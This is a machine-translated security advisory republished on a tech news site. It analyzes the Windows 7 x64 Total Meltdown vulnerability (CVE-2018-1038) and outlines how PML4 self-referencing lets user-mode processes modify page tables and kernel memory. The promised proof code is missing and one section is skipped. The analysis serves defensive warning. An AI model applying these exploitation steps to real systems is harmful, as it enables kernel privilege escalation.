Shulou(Shulou.com)06/01 Report--

In this issue, the editor will bring you about Microsoft TotalMeltdown vulnerability analysis and early warning. The article is rich in content and analyzed and described from a professional point of view. I hope you can get something after reading this article.

Overview of 0x00 vulnerabilities

A serious vulnerability (Total Meltdown) was found in Microsoft's January and February 2018 Windows7 x64 and Windows Server 2008 R2 security patches, which mistakenly set PML4 permissions to the user level, resulting in arbitrary user-mode processes to read and write to the system kernel.

360-CERT analyzed this vulnerability and suggested that affected users can patch and upgrade it through the 360 security guard.

0x01 vulnerability impact surface

Vulnerability hazard level: high risk

Vulnerability number: CVE-2018-1038

Affect the version:

Windows 7 x64

Windows Server 2008 R2

0x02 x64 paging principle

Intel X64 uses a four-level paging mode: PML4 (Page Map Level 4), PDPT (Page Directory Pointer), PD (Page Directory), PT (Page Table Entry). After installing the January and February security updates, the system mistakenly sets the memory permissions pointed to by the virtual address 0xFFFFF6FB7DBED000 to be user readable. The principle of the vulnerability is as follows. Four-level paging structure: PML4, PDPT, PD, PT

Because the permission bit of PML4 self-reference is readable and writable

So using self-citation, hackers can modify any data in PML4, PDPT, PD or PT.

Mapping from normal virtual address to physical address:

PML4-PDPT-PD-PT----PAGE-PAddr

Use self-reference to access protected data:

The first step is to modify the page protection bit (assuming that the PML4, PDPT, PD and PT corresponding to the address are all readable and writable to the user, if not, the principle is the same), and first find a way to obtain the PTE (using self-reference) address corresponding to the page:

Method: PML4-PML4----PDPT-PD-PT-PTE

Modify the protection bit to be readable and writable.

Step 2: modify the data directly (since the permission bit has been modified in the first step, no exception will be thrown)

The proof code is as follows:

Principle of 0x04 peileech tool

According to the principle of the vulnerability, the author of the vulnerability updated the memory reading tool pcileech to version 3.2 to enable it to exploit the vulnerability.

two。 Download dedicated testing tool: http://down.360safe.com/totalmeltdown_fix.exe

The above is the Microsoft TotalMeltdown vulnerability analysis early warning shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.